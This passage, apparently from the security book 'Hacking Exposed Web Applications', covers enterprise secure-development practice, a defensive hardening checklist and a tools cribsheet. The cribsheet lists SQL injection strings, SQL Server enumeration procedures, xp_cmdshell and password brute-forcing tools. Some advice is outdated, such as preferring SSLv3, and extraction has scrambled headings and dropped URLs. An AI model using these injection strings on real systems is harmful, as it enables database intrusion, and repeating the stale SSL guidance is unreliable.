to gain prominence in business, the market will continue to evolve better security code review and testing technologies. We’ve already seen some examples in Table 10-1 earlier in this chapter. Make sure to keep your SDL toolset state-of-the-art so your applications face less risk from cutting-edge zero-day attacks. Managed Execution Environments We strongly recommend migrating your web applications to managed development platforms like Sun’s Java ( or Microsoft’s .NET Framework ( if you have not already. Code developed using these environments leverages strong memory management technologies and executes within a protected security sandbox that greatly reduces the possibility of security vulnerabilities. Chapter 10: The Enterprise Web Application Security Program 407 Input Validation/Output Encoding Libraries Almost all software hacking rests on the assumption that input will be processed in an unexpected manner. Thus, the holy grail of software security is airtight input validation (and also output encoding). Most software development shops cobble their own input validation routines, using regular expression matching (try for great tips). For output encoding, Microsoft also publishes an Anti-XSS library that can be integrated into .NET applications. If at all possible, we recommend using such input validation libraries to deflect as much noxious input as possible from your applications. If you choose to implement your own input validation routines, remember these cardinal rules of input validation: • Limit the amount of expected user input to the bare minimum, especially freeform input. • Assume all input is malicious and treat it as such, throughout the application. • Never—ever—automatically trust client input. • Canonicalize all input before you perform any type of checking or validation. • Constrain the possible inputs your application will accept (for example, a ZIP code field might only accept five-digit numerals). • Reject all input that does not meet these constraints. • Sanitize any remaining input (for example, remove metacharacters like & ‘ > < and so on, that might be interpreted as executable content). • Encode output so even if something sneaks through, it’ll be rendered harmless to users. See Chapter 6 for more input validation attacks and countermeasures. Platform Improvements Keep your eye on new technology developments like Microsoft’s Data Execution Prevention (DEP) feature. Microsoft has implemented DEP to provide broad protection against memory corruption attacks like buffer overflows (see .com/kb/875352/ for full details). DEP has both a hardware and software component. When run on compatible hardware, DEP kicks in automatically and marks certain portions of memory as nonexecutable unless it explicitly contains executable code. Ostensibly, this would prevent most stack-based buffer overflow attacks. In addition to hardware-enforced DEP, Windows XP SP2 and later also implement software-enforced DEP that attempts to block exploitation of exception-handling mechanisms in Windows. 408 Hacking Exposed Web Applications Additional defensive mechanisms such as Address Space Layout Randomization (ASLR) and Structured Exception Handling Overwrite Protection (SEHOP) can be effective defenses against certain types of attack. For more information about these defenses and to determine whether they make sense in your application, please see “References & Further Reading” at the end of this chapter. Web application developers should be aware of these improvements coming down the pike in 64-bit platforms and start planning to migrate as soon as possible. Automated Web Application Security Scanners If you’re an IT admin tasked with managing security for a medium-to-large enterprise full of web apps, we don’t have to sell you on the tremendous benefits of automation. Over the years, we’ve evaluated dozens of web application security scanning tools and are frequently asked “Which one is the best?” As tempting as it is to hold a bake-off and pick our own favorites (which we did in the 2nd edition of Hacking Exposed Web Applications), we’ve come to realize that the market for such technologies evolves faster than our publishing cycle, inevitably rendering our picks somewhat obsolete by the time readers see them. Plus, the unique requirements that typical enterprise organizations bring to such comparisons are difficult to capture consistently in generic bake-offs. Finally, generic bake-offs are published regularly on the Internet, providing more up-todate information for readers (we’ve referenced some good recent studies in “References & Further Reading” at the end of this chapter). Based on these factors and on our ongoing experiences, this chapter will provide our brief perspectives on the leading contenders in the web application scanning field, with the intent of starting readers on a path to evaluating several of these tools and picking the one that best suits their individual requirements. See Chapter 1 and Appendix B for noncommercial web assessment tools not covered here. The web application security scanners we encounter most frequently (whether used by outside consultants or internal corporate security departments), in the order of most often encountered to least, include HP WebInspect, IBM AppScan, Cenzic Hailstorm, and NTObjectives NTOSpider. More recently, managed services have been appearing that perform web application security scanning and provide you with the results. Examples of such organizations include WhiteHat Security and HP SaaS Application Security Center. This would be the short list upon which we’d base an evaluation of such technologies for a large enterprise. Chapter 10: The Enterprise Web Application Security Program 409 Some of the big players in the infrastructure security scanning market are beginning to focus on web applications. The main providers here include Qualys’ Web Module, nCircle’s WebApp360, McAfee’s Vulnerability Manager, and Tenable’s Nessus web server plug-ins. Although these tools are improving, the current state of web functionality offered by these products falls far short of the dedicated web application scanning tools mentioned previously. Nevertheless, it would be wise to consider them ongoing as the companies behind them are resourceful and clearly interested in improving capabilities at the web app layer. Technology Evaluation and Procurement One of the ongoing questions facing an incipient application security program is “To build or to buy?” Overall, our advice is “buy,” based on our general experience that the blood and treasure spilled in the name of developing in-house security apps isn’t worth it in the long run (we’ve even worked at some large, sophisticated software development firms where this still held true). This means you’ll have to devise a process for evaluating new technology on an ongoing basis to ensure your web app security program remains up-to-snuff. Appendix B lists several off-the-shelf sample web applications that can be used to test security technologies. We recommend you explicitly staff this effort, define crisp goals so it doesn’t get too “blue sky” or turn into a wonky “skunk works” project, and ensure you have allocated an appropriate budget to execute any technology selections made by the team. SUMMARY This chapter covered full-knowledge, or “white-box,” analysis of web application security. We described the key components of full-knowledge analysis, including threat modeling, code review, and security testing. We highlighted the importance of threat modeling and how it influences subsequent security activities like code review and security testing. Finally, we illustrated how savvy organizations are weaving the components of full-knowledge analysis into a comprehensive approach to web application security development called the Security Development Lifecycle, or SDL. 410 Hacking Exposed Web Applications REFERENCES & FURTHER READING Reference General References The Security Development Lifecycle, by Michael Howard and Steve Lipner Writing Secure Code, 2nd Ed. by Michael Howard and David C. LeBlanc 24 Deadly Sins of Software Security by Michael Howard, David LeBlanc, and John Viega Security Development Lifecycle (SDL) from Microsoft WhiteHat Website Security Statistics Report Microsoft Security Intelligence Report volume 8 Windows Data Protection (covers DPAPI) Validating ASP.NET Server Controls Java SE Security, including Java Cryptography Extension (JCE) and Java Authentication and Authorization Service (JAAS) ASP.NET Authorization Threat Modeling Trike Threat Modeling page Threat Modeling by Frank Swiderski and Window Snyder Microsoft’s Threat Modeling page Common Weaknesses Enumeration “Cheat Sheet: Web Application Security Frame,” Microsoft’s categorization system for common web application vulnerabilities Link Microsoft Press, ISBN: 0735622140 Microsoft Press, ISBN: 0735617228 McGraw-Hill Professional, ISBN: 0071626751 sdl/default.aspx resource/stats.html details.aspx?FamilyID=2c4938a0-4d644c65-b951-754f4d1af0b5&displaylang=en Protection_API library/aa479013.aspx java/javase/tech/index-jsp-136007.html library/wce3kxhd.aspx Microsoft Press, ISBN: 0735619913 sdl/getstarted/threatmodeling.aspx default.asp?url=/library/en-us/dnpag2/ html/tmwacheatsheet.asp Chapter 10: The Enterprise Web Application Security Program 411 Reference Risk Quantification Factor Analysis of Information Risk (FAIR) “DREAD is Dead” by Dana Epp Microsoft Security Response Center Security Bulletin Severity Rating System “A Complete Guide to the Common Vulnerability Scoring System (CVSS)” Code Review Writing Secure Code, 2nd Ed. by Michael Howard and David C. LeBlanc Secure Programming with Static Analysis by Brian Chess and Jacob West “How To: Perform a Security Code Review for Managed Code” by Microsoft Real World Code Review – Using the Right Tools in the Right Place at the Right Time, Microsoft BlueHat v8 “Security Code Review Guidelines” by Adam Shostack Apache Struts Framework Binary Analysis Open Reverse Code Engineering OllyDbg OllyDbg Discussion Forum WinDBG IDA Pro Fuzz-Testing Spike Fuzzer Peach Fuzzing Platform Fuzz Testing of Application Reliability at University of Wisconsin Madison Link http://fairwiki.riskmanagementinsight .com/ archives/000875.html security/bulletin/rating.mspx Microsoft Press, ISBN: 0735617228 Addison-Wesley, ISBN: 0321424778 default.asp?url=/library/en-us/dnpag2/ html/paght000027.asp security/dd285265.aspx review.html devtools/debugging/default.mspx resources-freesoftware.shtml fuzz.html 412 Hacking Exposed Web Applications Reference “The Advantages of Block-Based Protocol Analysis for Security Testing” by David Aitel The Shellcoder’s Handbook: Discovering and Exploiting Security Holes by Jack Koziol, et al. Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw How to Break Software Security: Effective Techniques for Security Testing by James A. Whittaker and Herbert H. Thompson Web App Security Tools “Analyzing the Accuracy and Time Costs of Web Application Security Scanners “ by Larry Suto Microsoft’s Anti-Cross-Site Scripting (XSS) Library Security in the Development Lifecycle Microsoft’s SDL page Software Assurance Maturity Model (SAMM) The Building Security In Maturity Model (BSIMM) Comprehensive, Lightweight Application Security Process (CLASP) NIST 800-64, “Security Considerations in the Information System Development Life Cycle” Link downloads/advantages_of_block_based_ analysis.pdf John Wiley & Sons, ISBN: 0764544683 Addison-Wesley, ISBN: 0201786958 Pearson Education, ISBN: 0321194330 Time_Costs_of_Web_App_Scanners.pdf details.aspx?FamilyID=9A2B9C92-7AD9496C-9A89-AF08DE2E5982 sdl/default.aspx Category:OWASP_CLASP_Project PubsSPs.html A ApCSphelWeciuceckbratlitiisoytn 414 Hacking Exposed Web Applications This checklist summarizes the many recommendations and countermeasures made throughout this book. Although we have not reiterated every detail relevant to each checklist item here, we hope they serve as discrete reminders of the many security best practices that should be considered when designing and operating any web application. Item Network Perimeter firewall, screening router, or other filtering device established between web application and untrusted networks. Try to avoid using filtering devices that do not support stateful packet inspection (SPI). Firewall/router configured to allow only necessary traffic inbound to web application (typically only HTTP and/or SSL). Firewall/router configured to permit only necessary traffic outbound from the web application (typically TCP SYN packets are dropped to prevent servers from initiating outbound connections). Appropriate denial-of-service countermeasures enabled on firewall/ gateway (for example, Cisco rate limit command). Load balancers configured not to disclose information about internal networks. A Network Intrusion Detection System (NIDS) may be optionally implemented to detect common TCP/IP attacks; appropriate log review policies and resources should be made available if NIDS is implemented. Disable Telnet on routers and other network devices that have it enabled for remote administration. Use SSH instead. Perform regular password audits of any services that may be used for remote administration (e.g., SSH) and also limit the remote IP addresses that can be used to access these services. Network vulnerability scans conducted regularly to ensure no network or system-level vulnerabilities exist. Manual penetration tests conducted by a third party at least twice a year or every time significant changes are made to the network infrastructure to identify more complex vulnerabilities. Web Server Latest vendor software patches applied. Servers configured not to disclose information about the server software and plug-ins/modules installed (for example, banner information changed). Servers configured not to allow directory listing and parent paths. Servers configured to disallow reverse proxy. Check Appendix A: Web Application Security Checklist 415 Item Unnecessary network services disabled on all servers. OS and server vendor-specific security configurations implemented where appropriate. Unnecessary users or groups (e.g., Guest) disabled or removed. Operating system auditing enabled, as well as web server logging in W3C format. Unnecessary HTTP modules or extensions disabled on all servers (e.g., unused IIS ISAPI DLLs unmapped and Apache mods uninstalled). Sample web content/applications removed from all servers. Appropriate authentication mechanisms configured for relevant directories. Secure Sockets Layer (SSL) is deployed to protect traffic that may be vulnerable to eavesdropping (e.g., HTTP Basic Authentication). Require 128-bit encryption and do not allow downgrades to weaker export-grade encryption for sensitive transactions. Also disable support for SSLv2; use only SSLv3. Virtual roots containing web content deployed on a separate, dedicated disk drive/volume (without administrative utilities). Disable directory listing and parent paths. Customize error pages to avoid information leaks. Account running HTTP service should be low-privileged. Appropriate Access Control Lists (ACLs) set for web directories and files. WebDAV functionality disabled or removed if not used; otherwise, WebDAV should be heavily restricted. Web Publisher functionality (for Netscape/iPlanet products) disabled. Web server security modules deployed where appropriate (e.g., IIS UrlScan or Apache ModSecurity). Servers scanned by vulnerability scanner for remotely exploitable vulnerabilities; issues addressed. A Host Intrusion Detection System (HIDS) may be optionally implemented to detect common applications; appropriate log review policies and resources should be made available if HIDS is implemented. Database Server Database software installed to run with least privilege (e.g., in the context of a low-privileged local or domain account on Microsoft SQL Servers). Database software updated to the latest version with appropriate vendor patches. Check 416 Hacking Exposed Web Applications Item Sample accounts and databases removed from the server. Appropriate IP packet filtering enabled to restrict traffic between web servers and database servers (e.g., SPI Firewall, router, or IPSec filters on Windows 2000 and above). If possible, locate database servers on their own network segment with a dedicated SPI Firewall and do not allow outbound traffic from that segment. Appropriate authentication is employed between web servers and the database (e.g., for Microsoft servers, use integrated authentication). Default database user account passwords changed (no blank sa passwords!). Privileges for database users limited appropriately (queries should not simply be executed as sa). If not needed, extended stored procedures deleted from database software and relevant libraries removed from the disk. Database user passwords not embedded in application code. Perform password audits regularly. Applications Threat models documented and approved by the appropriate team. Appropriate security development lifecycle milestones achieved. Development/QA/test/staging environments physically separated from the production environment. Do not copy production data into QA/test/ staging. Appropriately strong authentication implemented in the securest fashion (e.g., via HTTPS, passwords stored as hashes, password self-support functionality best practices, and so on). Appropriate ACLs set for application directories and files. Appropriate input validation and output encoding performed on the server side. Source code of application scripts, include files, and so on, sanitized of secrets, private data, and confidential information. Temporary and common files (e.g., .bak) removed from servers. Authorization/session management implemented appropriately (strongly recommend using platform-provided capabilities, such as ASPSESSIONID or JSESSIONID, ASP.NET IsInRole, and so on). Always perform explicit access control—don’t assume user won’t access something just because he or she doesn‘t know the link or can’t tamper with HTTP requests. Check Appendix A: Web Application Security Checklist 417 Item Always grant a new session ID after a login; always have a logout feature; use a timeout to expire sessions; and don’t allow multiple concurrent sessions. Application user roles established using least privilege. If the application allows new users registration, use a CAPTCHA and require e-mail validation. Do not allow weak passwords. Encryption implemented using established algorithms that are appropriate for the task. Include files should be placed outside of virtual roots with proper ACLs. On Microsoft IIS servers, include files should be renamed to .asp. Dangerous API/function calls (e.g., RevertToSelf on IIS) identified and avoided if possible. Parameterized SQL queries required. On .NET framework, review calls that can break out of the .NET framework security (COM Interop, P/Invoke, Assert). Proper error handling and security logging enabled. Rigorous security source code audit performed. Remote “black box” malicious input testing performed. Perform password audits regularly. Application vulnerability scans conducted regularly to mitigate against application-level vulnerabilities. Third-party manual pen-testing performed before release and after any significant change is made to the application. Client Side Note: In contrast to previous sections of this checklist, which are written from the web application administrator or developer’s viewpoint, this section takes the enduser’s perspective. Admins and developers should take note, however, and design and implement their applications to meet these requirements. Personal firewall enabled with minimal allowed applications, both inbound and outbound. Run with least privilege. Never log on as Administrator (or equivalent highly privileged account) on a system that you will use to browse the Internet or read e-mail. All client software is up-to-date on all relevant software security patches (automatic updates optionally enabled). Be particularly diligent with IE— we do not recommend using version prior to 8. Check 418 Hacking Exposed Web Applications Item Antivirus software installed and configured to scan real-time (particularly incoming mail attachments) and to automatically update. For example, Microsoft Security Essentials is free and provides real-time protection against viruses, spyware, and other malicious software (malware). Anti-adware/spyware/malware and anti-phishing utilities installed in addition to antivirus (assuming antivirus does not already have these features). Configure Internet client security conservatively; for example, Windows Internet Options Control Panel (also accessible through IE and Outlook/ OE) should be configured as advocated in Chapter 9. If configured separately, ensure other client software (especially e-mail!) uses the most conservative security settings (e.g., Restricted Sites zone in Microsoft e-mail clients). Configure Office productivity programs as securely as possible; for example, if you are using an old version of Microsoft Office, set the macro security to Very High under Tools | Macro | Security (this is the default setting in newer versions). Cookie management enabled within the browser or via a third-party tool such as CookiePal. Disable caching of SSL data. Don’t be gullible. Approach Internet-borne solicitations and transactions with high skepticism. For sensitive URIs (e.g., online banking), manually type addresses or use known-good Favorites/Bookmarks—never click hyperlinks! Keep your computing devices physically secure (especially mobile devices such as laptops, Blackberrys, and cell phones). Do not store confidential information on mobile devices unencrypted (including e-mail messages). Also turn off Bluetooth and Wi-Fi when not in use. Recommended Additional Client Configurations Automatic software updates enabled (for example, Microsoft’s Automatic Update Service). E-mail software configured to read e-mail in plaintext. Kill-bit set on unneeded ActiveX controls. Change operating system default configurations (for example, instead of the default C:\Windows, install with an unusual Windows folder name like C:\Root). Disable AutoComplete on your browser (automatic completion of HTML forms with usernames, passwords, and other information). Disable Browser History. Check B WTeTCeborcoHihblansscihqakenuinedetgs 420 Hacking Exposed Web Applications We’ve discussed numerous tools and techniques in this book for assessing the security of web applications. This appendix summarizes the most important of these in an abbreviated format designed for use in the field. It is structured around the web hacking methodology that comprises the chapters of this book. Web Browsers and Open Proxies Internet Explorer default.aspx Firefox Chrome Safari Open HTTP/S Proxies IE Extensions for Web Security TamperIE IEWatch IE Headers IE Developer Toolbar .aspx?FamilyID=E59C3964-672D-4511-BB3E2D5E1DB91038&displaylang=en Firefox Extensions for Web Security WebDeveloper FireBug FoxyProxy User Agent Switcher SeleniumHQ HTTP/S Proxy Tools Burp Suite Fiddler WebScarab WebScarab_Project Paros Proxy Sample Web Applications for Security Testing Gruyere (live) FreeBank Online (live) Crack Me Bank (live) Appendix B: Web Hacking Tools and Techniques Cribsheet 421 AltoroMutual (live) Acunetix Acublog (registration required) Hacme Travel hacmetravel.htm Hacme Bank hacmebank.htm Hacme Shipping hacmeshipping.htm Hacme Casino hacmecasino.htm Hacme Books hacmebooks.htm SecuriBench SecuriBench Micro OWASP WebGoat Command-line Tools cURL Netcat OpenSSL Stunnel Crawling Tools Wget crawler4j HTTrack Free Dynamic Web Application Security Scanners Burp Scanner Paros Proxy OWASP WebScarab Grabber Nikto ratproxy w3af skipfish Netsparker Browser DOM Checker 422 Hacking Exposed Web Applications Commercial Dynamic Web Application Security Scanners Acunetix Web Vulnerability Scanner Cenzic Hailstorm Syhunt Sandcat Scanner HP WebInspect hpms_content.jsp?zn=bto&cp=1-11-201-200^9570_4000_100__ IBM AppScan NTObjectives NTOSpider Code Analysis Tools Java Decompiler JAD Armorize CodeSecure Checkmarx CxSuite Fortify 360 Veracode Splint Valgrind Flawfinder RATS FXCop .aspx ITS4 PREfast OunceLabs Ounce Coverity Static Analysis OWASP Orizon Orizon_Project FindBugs Jlint CAT.NET details.aspx?FamilyId=0178e2ef-9da8-445e-9348c93f24cc9f9d&displaylang=en Appendix B: Web Hacking Tools and Techniques Cribsheet 423 Red Gate .NET Reflector Binary Analysis Open Reverse Code Engineering (OpenRCE) OllyDbg IDA Pro WinDbg default.mspx Profiling Tools Httprint SiteDigger sitedigger.htm Wayback Machine GoogleDiggity BingDiggity Maltego Shodan Authentication Task Tool/Technique Resource Local NTLM proxy Cntlm Authentication Proxy http://cntlm.sourceforge .net/ Password brute-forcing OWASP WebSlayer http://www.owasp .org/index.php/Category:OWASP_ Webslayer_Project Password brute-forcing THC-Hydra .php CAPTCHA decoder PWNtcha PWNtcha Authorization/Session Management Task Tool/Technique Resource Directory/file permissions OWASP DirBuster php/Category:OWASP_DirBuster_ Project Cookie analysis Cookie Spy shell/cookiespy.aspx 424 Hacking Exposed Web Applications Cookie analysis Encoding and decoding ViewState decoding WebDAV Tools cadaver UrlScan DAVTest Web Services/SOAP Tools soapUI SOAP Tools WSDigger WebInject Web Service Studio wsChess OWASP WSFuzzer WSMap WSBang Input Validation Task Cross-site scripting Web Fuzzing HTTP/S Fuzzing General Fuzzing Browser Fuzzing CookiePie Burp Decoder ViewState Decoder products/cookiepie-tab-firefoxextension suite/decoderhelp.html .aspx wsdigger.htm WSFuzzer_Project Tool/Technique XSS Cheat Sheet SPIKE Proxy JBroFuzz Peach Fuzzing Platform Hamachi, CSSDIE, DOM-Hanoi, AxMan Resource resources-freesoftware.shtml index.php/Category:OWASP_ JBroFuzz#tab=Main Appendix B: Web Hacking Tools and Techniques Cribsheet 425 Popular Characters to Test Input Validation Character URL Encoding Comments ' %27 The mighty tick mark (apostrophe), very useful for SQL injection, can trigger informational errors ; %3b Command separator, line terminator for scripts [null] %00 String terminator for file access, command separator [return] %0a Command separator + %2b Represents [space] on the URL, good for SQL injection < %3c Opening HTML tag > %3e Closing HTML tag % %25 Useful for double decode, search fields ? %3f Separates base URL from query string = %3d Separates name value pairs in the query string ( %28 SQL injection ) %29 SQL injection [space] %20 Necessary for longer scripts . %2e Directory traversal, file access, used in combination with / / %2f Directory traversal, file access, used in combination with . SQL Formatting Characters Description ' Terminates a string. Single line comment, ignores the remainder of the line. % A wild card that matches any string of zero or more characters. _ A wild card that matches any single characters. Basic SQL Injection Syntax Query Syntax Result OR 1=1 Creates true condition for bypassing logic checks. 426 Hacking Exposed Web Applications ' OR '1'='1 Creates true condition for bypassing logic checks. Variation when injecting into a string. OR 1=2 Creates false condition for validating SQL injection. ' OR '1'='2 Creates false condition for validating SQL injection. Variation when injecting into a string. UNION ALL SELECT Retrieves all rows from a table if condition is true. Useful MS SQL Server (Transact-SQL) Variables @@LANGUAGE Returns the name of the language currently being used. @@SERVERNAME Returns the name of the local server that is running SQL Server. @@SERVICENAME Returns the name of the registry key under which SQL Server is running. @@VERSION Returns version, processor architecture, build date, and operating system for the current installation of SQL Server. Stored Procedures for Enumerating SQL Server Stored Procedure Description sp_columns Most importantly, returns the column names of a table. sp_configure [name] Returns internal database settings. Specify a particular setting to retrieve just that value—for example, sp_ configure 'remote query timeout (s)'. sp_dboption Views (or sets) user-configurable database options. sp_ helpextendedproc Lists all extended stored procedures. sp_who2 [username] (and sp_who) Displays usernames, the host from which they’ve connected, the application used to connect to the database, the current command executed in the database, and several other pieces of information. Both procedures accept an optional username. This is an excellent way to enumerate a SQL database’s users as opposed to application users. MS SQL Parameterized Extended Stored Procedures Extended Stored Procedure Description xp_cmdshell The equivalent of cmd.exe—in other words, full commandline access to the database server. Cmd.exe is assumed, so you would only need to enter dir to obtain a directory listing. The default current directory is %SYSTEMROOT%\System32. Appendix B: Web Hacking Tools and Techniques Cribsheet 427 xp_regread , , Reads a registry value. xp_servicecontrol , Starts or stops a Windows service. xp_terminate_ process Kills a process based on its process ID. MS SQL Nonparameterized Extended Stored Procedures Extended Stored Procedure Description xp_loginconfig Displays login information, particularly the login mode (mixed, etc.) and default login. xp_logininfo Shows currently logged-in accounts. Only applies to NTLM accounts. xp_msver Lists SQL version and platform information. xp_enumdsn Enumerates ODBC data sources. xp_enumgroups Enumerates Windows groups. xp_ntsec_ enumdomains Enumerates domains present on the network. SQL System Table Objects System Table Object Description syscolumns All column names and stored procedures for the current database, not just the master. sysobjects Every object (such as stored procedures) in the database. sysusers All of the users who can manipulate the database. sysfiles The file- and pathname for the current database and its log file. systypes Data types defined by SQL or new types defined by users. Default SQL Master Database Tables Master Database Table Description sysconfigures Current database configuration settings. sysdatabases Lists all databases in the server. sysdevices Enumerates devices used for databases, logs, and temporary files. sysxlogins Enumerates user information for each user permitted to access the database. 428 Hacking Exposed Web Applications sysremotelogins Enumerates user information for each user permitted to remotely access the database or its stored procedures. sysservers Lists all peers that the server can access as an OLE database server. Common Ports Used for Web Management Port Typical Service 21 FTP for file transfer 22 Secure Shell (SSH) for remote management 23 Telnet for remote management 80 World Wide Web standard port 81 Alternate WWW 88 Alternate WWW (also Kerberos) 443 HTTPS 900 IBM Websphere administration client 2301 Compaq Insight Manager 2381 Compaq Insight Manager over HTTPS 4242 Microsoft Application Center Management 7001 BEA WebLogic administration 7002 BEA WebLogic administration over SSL 7070 Sun Java Web Server over SSL 8000 Alternate web server or web cache 8001 Alternate web server or management 8005 Apache Tomcat 8080 Alternate web server, Squid cache control (cachemgr.cgi), or Sun Java Web Server 8100 Allaire JRUN 88x0 Ports 8810, 8820, 8830, and so on, usually belong to ATG Dynamo 8888 Alternate web server 9090 Sun Java Web Server admin module 10000 Netscape Administrator interface (default) INDEX & (ampersand), 258, 259 * (asterisk), 238 ^ (caret), 255 % (percent sign), 237 _ (underscore), 238 ; (semicolon), 258, 259 < > (angle brackets), 261 ! character, 58 | (pipe) character, 258 3DES key, 290–291 ▼A access control, 107, 262 access control lists. See ACLs access tokens, 168, 170–172 access/session token attacks, 178–195 account lockouts, 126–127, 128, 132, 381 accountability, 401–403, 405 Achilles tool, 26 ACLs (access control lists) attacks on, 177–178 best practices, 211–214 considerations, 111, 168 file disclosure and, 320 NTFS, 111–112 web crawling, 169–170 Acrobat Reader, 346 Active Server Pages. See ASP ActiveX controls countermeasures, 361–363 vulnerabilities, 347, 348 ActiveX GUIDs, 363 Add-on Manager, 361–362 Address Space Layout Randomization (ASLR), 338, 408 administrators authentication, 203–204 insecure functions, 204 web document roots, 83–84 advanced directory traversal, 228–230 adxmlrpc.php script, 98–100 AJAX (Asynchronous JavaScript and XML), 8, 9 allow_url_fopen option, 119 ampersand (&), 258, 259 AND operator, 252 angle brackets < >, 261 anonymity, 9–10 Anti-Phishing Working Group (APWG), 352, 353 antivirus software, 346 Apache announcements list, 108 Apache Benchmark, 117 Apache hardening, 113–117 Apache modules, 389 Apache patches, 108 Apache Struts Framework, 384 Apache Tomcat, 97–98, 310–311 429 430 Hacking Exposed Web Applications Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability, 310–311 Apache web servers authorization, 211–212 chrooting, 115–116 disabling extensions, 310 references, 174 securing, 113–117 status page information leakage, 321–322 WebDAV on, 307 applets, 56–57 application behavior, 237–238 application profiling, 45–82 automated web crawling, 72–77 common profiles, 77–82 manual inspection, 46–66 overview, 45–46 search tools, 66–72 application providers, 148 application servers, 88 application whitelisting, 361 application-layer components, 88 applications. See web applications APS (Authorization Proxy Server) utility, 131 APWG (Anti-Phishing Working Group), 352, 353 archives, 320 ASCII characters, 172 ASCII strings, 394, 395 ASLR (Address Space Layout Randomization), 338, 408 ASP (Active Server Pages), 101–103, 216, 327 ASP engine, 327 ASP scripts, 108 ASP.NET authorization, 216 errors, 324–325 hacking ViewState, 328–332 ASP.NET Forms authentication, 137–138 assets, identifying, 374–375 asterisk (*), 238 Asynchronous JavaScript and XML (AJAX), 8, 9 attack vectors, 224–225 attacks. See also hacking web applications on access control lists, 177–178 access/session token, 178–195 availability, 11–12 bit flipping, 152, 193–194 brute-force. See brute-force attacks buffer overflow. See buffer overflow attacks canonicalization, 227–232 capture/replay, 194 client plug-in, 346–347 confused deputy, 153–154 cross-domain access, 344 cross-site request forgery, 153–157, 355 denial-of-service. See denial-of- service attacks dictionary, 129, 191–192 Double Decode/Unicode, 177, 216 eavesdropping. See eavesdropping attacks external entity, 283–285 forms authentication, 130, 132, 137–143 identifying, 109 injection. See injection attacks man-in-the-middle, 145, 161, 194 memory corruption, 338, 345, 407 password guessing, 127–133, 148, 158 phishing. See phishing attacks privilege escalation. See privilege escalation attacks replay, 133–137 repudiation, 256–257 on session IDs, 151–152 sniffing, 133 targets, 11–12 timing, 127 token, 178–195 token replay, 151–153 Index 431 transport, 11 user registration, 126, 157–159 on web applications, 9–12–28 on web clients, 11 on web platforms, 11 web services, 279–287 XML external entity, 283–285 XML web service, 279–287 XPath injection, 251–253, 285–287 XQuery injection, 285–287 authentication. See also web authentication administrator, 203–204 application profiling and, 46 ASP.NET Forms, 137–138 certificate-based, 144 challenge-response, 136 considerations, 6–7 delegated, 148–149 Digest, 136–137 files, 320 folders, 320 forms-based, 130, 132, 137–143 HTTP, 129, 134–135, 288 HTTP Basic, 129, 134–135 identity management, 157–161 Integrated Windows, 130–131 NTLM, 130–131 references, 164–166 requiring, 156, 250, 262 Secure Shell, 297 session management, 423–424 tips for, 84, 162 tools/techniques, 423 two-factor, 144, 145 username/password, 124–143 users, 144 WebLogic Node Manager, 95–96 Windows Live ID, 147–149, 160, 164 XML web services, 288 Authentication and Authorization Service (JAAS), 387 authentication credentials, 156, 250 authentication failures, 133 authentication services, 124 Authenticode, 347 authorization. See also web authorization Apache web servers, 211–212 ASP.NET, 216 code vulnerabilities, 385–387 considerations, 6–7 HTTP headers, 5 IIS, 212–213 IP addresses, 214 off-the-shelf, 170, 172, 214 Authorization Proxy Server (APS) utility, 131 automated password guessing, 128–130 automated web crawling, 72–77 availability attacks, 11–12 AWStats application, 258 AxBan tool, 363 ▼B B2B (business-to-business) applications, 144 b2evolution, 98 backend access points, 66 backups, 320 banner grabbing, 33–34 Base64 cookies, 153, 186 Base64 decoder, 328–330 Base64 encoding, 173 BHOs (Browser Helper Objects), 14 binary analysis, 387–396, 411, 423 bit flipping attacks, 152, 193–194 black lists, 261, 384 Black Widow tool, 76, 78 body, 4–5, 15 Boolean arguments, 65 Boolean values, 237 bots, 158 boundary checks, 236–237 breadth-first algorithms, 128 BroadVision URL, 79 Browser Helper Objects (BHOs), 14 browsers. See web browsers browsers, offline, 169 432 Hacking Exposed Web Applications brute-force attacks credential guessing, 381 dictionary attacks, 191–192 directories/files, 52 password guessing, 129–130 session ID attacks, 152 token reply attacks, 197 Brutus tool, 129–130, 131, 132, 140 buffer overflow attacks DEP feature and, 407 input validation, 223–224 overview, 226–227 “bug bar,” 380 “build from scratch” syndrome, 404 Burp Intruder tool, 23, 24 Burp Suite Spider, 76 Burp web proxy, 185, 191, 225 business-to-business (B2B) applications, 144 byte arrays, 342–343 ▼C cache control, 5 CACLS tool, 111–112 canonicalization attacks, 227–232 CANVAS tool, 89 CAPTCHA technology, 126, 132, 157–159, 164, 381 capture/replay attacks, 194 CardSpace technology, 150–151, 165 CardSystems, 162 caret (^), 255 Cascading Style Sheets. See CSS CAST() function, 249 Center for Internet Security (CIS), 117 certificate authentication, 144 certificate revocation lists (CRLs), 144 CeWL (Custom World List Generator), 297 CGI scripts, 116, 257, 259 CGI (Common Gateway Interface) specification, 6 challenge-response authentication, 136 character arrays, 394 cheat sheet, Microsoft, 377, 380 Chrome browser, 338, 351–352, 420 chrooting, 115–116 CIAA (confidentiality, integrity, availability, and audit-logging) requirements, 373, 377 CIL (Common Intermediate Language), 342 CIS (Center for Internet Security), 117 Cisco IOS vulnerability, 178 cleartext passwords, 108 cleartext SQL connect strings, 108 clickjacking, 355 client certificates, 144 client configurations, 418 client plug-in attacks, 346–347 clients. See web clients client-side code, 73 client-side piggybacking, 161 client-side security, 417–418 client-side storage, 349–352 client-side validation, 261 client-validation routines, 225 Cmdasp.asp file, 109 code authorization mistakes in, 385–387 client-side, 73 encoding output, 408 fuzz-testing, 23, 397–399 input validation, 383–384, 407 managed execution environments, 406 parameterized, 251 penetration testing, 400–401 poor input handling, 383–384 private data in, 108 review of. See code review sanitization routines, 383–384 secrets in, 385 security testing, 397–401 test, 387 tools for, 387, 388, 406 code analysis tools, 422–423 Index 433 Code Red worm, 309 code review automated, 387, 406 binary analysis, 387–396 common security problems, 383–387 enterprise web applications, 382–396 full-knowledge analysis, 372, 375, 382, 389, 409 manual, 382–387 references, 411 “collusion” effect, 309 command execution, 257–259 command-line tools, 25–26, 29, 421 comments auto-generated, 58–59 developer, 84 HTML, 58–59, 181 within scripts, 108 Common Gateway Interface. See CGI Common Intermediate Language (CIL), 342 common off-the-shelf. See COTS Common Vulnerability Scoring System (CVSS), 380 Concurrent Versions System (CVS), 315–316 confidentiality, integrity, availability, and audit-logging (CIAA) requirements, 373, 377 confused deputy attack, 153–154 CONNECT command, 42 connect strings, 108 connect tests, 42 consent user interface, 148 content. See web content $_COOKIE variable, 260 cookies ASP.NET forms, 139 Base64, 152, 186 bit flipping attacks, 152 common, 66 considerations, 185 described, 5 differential analysis and, 205–206 double-posted, 155–156 encrypting contents, 153 